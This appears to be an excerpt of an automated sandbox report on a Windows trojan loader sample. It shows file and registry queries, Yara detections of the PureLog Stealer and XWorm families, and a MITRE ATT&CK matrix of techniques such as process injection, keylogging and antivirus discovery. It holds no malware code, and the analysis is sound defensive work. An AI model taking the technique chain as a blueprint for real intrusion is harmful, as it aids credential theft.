                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected XWorm
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 672, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 5332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xNgpESfQOvfb.exe PID: 7084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xNgpESfQOvfb.exe PID: 380, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected XWorm
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 672, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 5332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xNgpESfQOvfb.exe PID: 7084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xNgpESfQOvfb.exe PID: 380, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    Input Capture                    		211
                    Security Software Discovery                    		Remote Services1
                    Input Capture                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		2
                    Registry Run Keys / Startup Folder                    		131
                    Virtualization/Sandbox Evasion                    		Security Account Manager131
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Clipboard Data                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials13
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
